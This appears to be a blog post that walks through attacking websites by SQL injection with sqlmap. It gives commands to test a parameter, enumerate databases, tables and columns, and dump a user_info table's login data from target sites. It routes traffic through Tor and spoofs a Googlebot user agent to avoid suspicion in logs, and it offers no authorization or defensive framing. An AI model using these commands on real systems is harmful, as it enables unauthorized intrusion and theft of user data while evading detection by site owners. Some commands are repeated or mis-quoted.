1. Testing
For example:
http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15
Would become
http://www.testwebsitesql.com/cgi-bin/item.cgi?item_id=15'
Difference between standard SQL & Blind SQL
When an attacker exploits an SQL injection flaw, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is almost identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. Blind SQL will not display syntax errors as normal SQL injection would and can be a lot harder to find.
2. Lets start open up a new terminal and use the following command to execute sqlmap.
# sqlmap
Now we know SQLMap is working. We need to install Tor this will help keep our anonymity.
Tor (The Onion Router) aims to conceal its users’ identities and their online activity from surveillance and traffic analysis by separating identification and routing. It is an implementation of onion routing, which encrypts and then randomly bounces communications through a network of relays run by volunteers around the globe.
Open up a new terminal and use the following command to install Tor.
# apt-get install tor
After Tor has installed you can execute it from a terminal using “tor”.
When Tor has finished bootstrapping leave terminal running in the back ground and open up a new terminal.
Depending on our Network set up we may like to use SQLMap without Tor or using a VPN, SQLMap with Tor with a random user agent to add a little bit extra anonymity.
Below I have listed various methods you can use to list DBMS databases in SQLMap. if you don’t know what command is best for you use Listing DBMS Using Tor + Google User Agent with SQLMap for anonymity.
3. Listing DBMS databases SQLMap
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
What this command does:
sqlmap = Name of sqlmap binary file to execute
-u = Target URL (e.g. “http://www.testwebsite.com/cgi-bin/item.cgi?item_id=15”)
–dbs = Tell SQLMap to Enumerate DBMS databases.
Listing DBMS Using Tor with SQLMap for anonymity.
Add these option to your sqlmap command to use tor along side SQLMap.
--tor --tor-type=SOCKS5
What this command does is tells SQLMap to use our Tor Tunnel instead of our original network address.
For example:
sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
Listing DBMS Using Tor + Google User Agent with SQLMap for anonymity.
sqlmap -u http://target-website.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
I will be using Tor and setting a Google Crawler as a user agent for additional obscurity. Google’s crawlers will often visit websites, and are one of the least suspicious entities in the website’s error logs.
We can use this to our advantage. by using the following command to mimic to be google bot.
Now we we can see what tables are available in the database its time to extract some information from it.
4. To list database tables we can use the following command.
Listing database tables in target MySQL Database.
sqlmap -u http://www.target-website.com/cgi-bin/item.cgi?item_id=15 -D databasetable --tables --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Replace -D databasetable with the name of the database table you are targeting.
SQLmap with now fetch the desired data table from the MySQL database.
Listing Database Columns
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --column --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Listing from Target Columns
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
We have now successfully listed the contents of the database we can then extract information from these tables by using the following command again.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
No comments:
Post a Comment